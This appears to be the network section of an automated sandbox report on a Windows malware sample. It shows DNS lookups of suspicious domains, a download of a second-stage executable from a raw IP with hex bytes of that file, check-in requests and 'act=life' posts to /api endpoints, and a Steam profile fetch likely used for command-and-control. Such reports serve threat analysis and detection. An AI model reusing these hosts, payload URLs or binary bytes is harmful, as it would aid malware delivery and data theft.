                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.805876017 CET53529481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.173424959 CET6008853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET53600881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.018982887 CET6318453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.159318924 CET53631841.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.179780006 CET6427753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.317240000 CET53642771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.324973106 CET5148153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.462673903 CET53514811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.503865004 CET6395353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.642215014 CET53639531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.656713009 CET5614853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.796127081 CET53561481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.797862053 CET6539353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.936794043 CET53653931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.938951015 CET5129053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.076380014 CET53512901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.092628956 CET192.168.2.41.1.1.10x30c3Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.521399021 CET192.168.2.41.1.1.10x9cb8Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.661006927 CET192.168.2.41.1.1.10xbb8fStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.173424959 CET192.168.2.41.1.1.10xf433Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.018982887 CET192.168.2.41.1.1.10x2c56Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.179780006 CET192.168.2.41.1.1.10xbe7cStandard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.324973106 CET192.168.2.41.1.1.10x27d9Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.503865004 CET192.168.2.41.1.1.10x7e5fStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.656713009 CET192.168.2.41.1.1.10x6729Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.797862053 CET192.168.2.41.1.1.10xf8f9Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.938951015 CET192.168.2.41.1.1.10x28f7Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.230386972 CET1.1.1.1192.168.2.40x30c3No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.230386972 CET1.1.1.1192.168.2.40x30c3No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.659321070 CET1.1.1.1192.168.2.40x9cb8Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.805876017 CET1.1.1.1192.168.2.40xbb8fNo error (0)immureprech.biz104.21.22.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.805876017 CET1.1.1.1192.168.2.40xbb8fNo error (0)immureprech.biz172.67.207.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.317714930 CET1.1.1.1192.168.2.40xf433No error (0)deafeninggeh.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.159318924 CET1.1.1.1192.168.2.40x2c56Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.317240000 CET1.1.1.1192.168.2.40xbe7cName error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.462673903 CET1.1.1.1192.168.2.40x27d9Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.642215014 CET1.1.1.1192.168.2.40x7e5fName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.796127081 CET1.1.1.1192.168.2.40x6729Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.936794043 CET1.1.1.1192.168.2.40xf8f9Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.076380014 CET1.1.1.1192.168.2.40x28f7No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              • post-to-me.com
                                                                                                                                                                                                                                                              • immureprech.biz
                                                                                                                                                                                                                                                              • deafeninggeh.biz
                                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449731176.113.115.19807276C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.516954899 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: ShareScreen
                                                                                                                                                                                                                                                              Host: 176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.867899895 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 14 Dec 2024 13:12:47 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Sat, 14 Dec 2024 13:00:02 GMT
                                                                                                                                                                                                                                                              ETag: "58600-6293a86885370"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 361984
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.867947102 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                                              Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuuu9Et
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.867964029 CET448INData Raw: 56 e8 cc 30 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 40 a3 81 00 eb 05 b9 08 4c 44 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 40 a3 81 00 eb 05 b8 08
                                                                                                                                                                                                                                                              Data Ascii: V0Ytt@LDA$u)tt@LD@$tWWWWW%M9}uNxAV,YEEEuV5,YUQSVW5l5h}YY;+CrwW
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.873892069 CET1236INData Raw: e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 60 10 00 00 c3 e8 15 25 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0 f7 d8 59 48 5d c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 b1 32 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 83 3d 0c 6b
                                                                                                                                                                                                                                                              Data Ascii: EE`%UuYH]Ujju2]U=kDu)u_'h$YY]jXh%D3uEP@Dj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSYujXY
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987637997 CET1236INData Raw: c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 a2 35 00 00 59 59 85 c0 75 17 57 e8 ac f4 ff ff 59 e8 3f fe ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 91 f4 ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b
                                                                                                                                                                                                                                                              Data Ascii: QjYY]9u,hW5YYuWY?]>WYEEHj(YUEV4AD>uP"Yuj]Y6D^]U|kU+Pr;r3]UMAVuW+yiD
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987704992 CET448INData Raw: c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 d8 10 44 00 85 c0 75 08 83 c8 ff e9 9d 00 00 00 8d 97 00 70 00 00 89 55 fc 3b fa 77 43 8b ca 2b cf c1 e9 0c 8d 47 10 41 83 48 f8 ff 83 88 ec 0f 00 00 ff 8d 90 fc 0f 00 00 89 10 8d 90 fc ef ff ff c7 40 fc
                                                                                                                                                                                                                                                              Data Ascii: yhWDupU;wC+GAH@PIuUEOHAJHAdD3GFCENCux!P_^[UMASVuW}+QiDM
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987741947 CET1236INData Raw: 1c fb 89 5d 10 8b 5b 04 89 59 04 8b 5d 10 89 59 08 89 4b 04 8b 59 04 89 4b 08 8b 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d
                                                                                                                                                                                                                                                              Data Ascii: ][Y]YKYKY;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987776041 CET1236INData Raw: 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 40 44 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc
                                                                                                                                                                                                                                                              Data Ascii: D$l$l$+SVW@D1E3PeuEEEEdMdY__^[]QUS]Vs35@DWEE{tN38NF38E@fMUS[EMt_I[LDEEt,.E|@GE
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987808943 CET1236INData Raw: 33 c9 29 85 e4 fa ff ff 8b 95 e4 fa ff ff 8d 84 0e 1d 01 00 00 03 d0 8d 5a 20 83 fb 19 77 0c 80 4c 0e 1d 10 8a d1 80 c2 20 eb 0f 83 fa 19 77 0e 80 4c 0e 1d 20 8a d1 80 ea 20 88 10 eb 03 c6 00 00 41 3b cf 72 c2 8b 4d fc 5f 33 cd 5b e8 38 e4 ff ff
                                                                                                                                                                                                                                                              Data Ascii: 3)Z wL wL A;rM_3[8jh8&DGDGptltwhuj &YjYewhu;5FDt6tVDuBDtVYFDGh5FDuVDEujW
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987845898 CET1236INData Raw: c1 df ff ff 59 e8 54 e9 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 73 f6 ff ff c3 83 3d 70 b4 81 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 70 b4 81 00 01 00 00 00 33 c0 c3 8b ff 55 8b ec 53 56 8b 75 08 8b 86 bc 00 00 00 33 db 57 3b c3
                                                                                                                                                                                                                                                              Data Ascii: YTeEs=pujVYp3USVu3W;to=(MDth;t^9uZ;t9uPH.YY;t9uP'.YYYY;tD9u@-P+P
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.988058090 CET1236INData Raw: ff be 70 12 44 00 56 ff 15 24 10 44 00 85 c0 75 07 56 e8 bc 05 00 00 59 89 45 e4 8b 75 08 c7 46 5c b8 18 44 00 33 ff 47 89 7e 14 85 c0 74 24 68 60 12 44 00 50 8b 1d 48 10 44 00 ff d3 89 86 f8 01 00 00 68 8c 12 44 00 ff 75 e4 ff d3 89 86 fc 01 00
                                                                                                                                                                                                                                                              Data Ascii: pDV$DuVYEuF\D3G~t$h`DPHDhDu~pCKCFhBDjYevhDE>jY}EFluHDFlvlYE3GujYjYVWD5HD


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449730172.67.179.2074437276C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-14 13:12:45 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: ShareScreen
                                                                                                                                                                                                                                                              Host: post-to-me.com
                                                                                                                                                                                                                                                              2024-12-14 13:12:46 UTC800INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 14 Dec 2024 13:12:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9pSSM0sVEwuOaFd9xb1kODihJ4fCdC%2BELGcO2qX%2BTQO4EzxjrnFXDF9zn0j7xab8P8zG0G2%2FaznkDC0Nabu4gS6PaKGqcviOzDAkkEic6DO9vqckQ0NtguQxCtinXXskw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f1e7285ec454283-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1579&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1796923&cwnd=241&unsent_bytes=0&cid=2e3912c8d45fefb4&ts=675&x=0"
                                                                                                                                                                                                                                                              2024-12-14 13:12:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-14 13:12:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449732104.21.22.2224437396C:\Users\user\AppData\Local\Temp\C455.tmp.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-14 13:12:54 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: immureprech.biz
                                                                                                                                                                                                                                                              2024-12-14 13:12:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-14 13:12:56 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 14 Dec 2024 13:12:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=9u613si7a5mtad28d4kftc5lmq; expires=Wed, 09-Apr-2025 06:59:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3hGrLi5Oc3%2BpvafsMv1WqrzCUhwvsJo7HdaOTJv2i3ruq5U9JA6KYFSiGuzekH2rfon9Ii4gdBcJ8wPoKoHVo9%2FciKC1rDsjxNYlfFJjHK4TJDbvnvInaoRiD%2BSldoGaDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f1e72bcdc650fa3-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1493&rtt_var=569&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1906005&cwnd=222&unsent_bytes=0&cid=c2730a90891c3fd4&ts=2124&x=0"
                                                                                                                                                                                                                                                              2024-12-14 13:12:56 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: aerror #D12
                                                                                                                                                                                                                                                              2024-12-14 13:12:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.449733104.21.96.14437396C:\Users\user\AppData\Local\Temp\C455.tmp.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-14 13:12:57 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: deafeninggeh.biz
                                                                                                                                                                                                                                                              2024-12-14 13:12:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-14 13:12:59 UTC1010INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 14 Dec 2024 13:12:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=d6q0ehdbr3sv4petf9upkfpdaf; expires=Wed, 09-Apr-2025 06:59:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2Lj%2FjRLUB%2F1SInJhDJvALSKcwDEnOj0udIsH5MyuYPvNzEOpwYjNQN4SZVkpLQCJ2NIL%2F6UITlzLIPJUbVu5k8QHTKqi8nLdJiDcEFj1ZKPC2nIDXly5L2SsBLVO5Eyg3Pr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f1e72d14b1dde9a-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1631&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1717647&cwnd=209&unsent_bytes=0&cid=533e8101cab46191&ts=1491&x=0"
                                                                                                                                                                                                                                                              2024-12-14 13:12:59 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: aerror #D12
                                                                                                                                                                                                                                                              2024-12-14 13:12:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.44973523.55.153.1064437396C:\Users\user\AppData\Local\Temp\C455.tmp.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-14 13:13:01 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                                                              2024-12-14 13:13:02 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Date: Sat, 14 Dec 2024 13:13:02 GMT
                                                                                                                                                                                                                                                              Content-Length: 35131
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: sessionid=be643b83ce4522182e6a9965; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                              2024-12-14 13:13:02 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
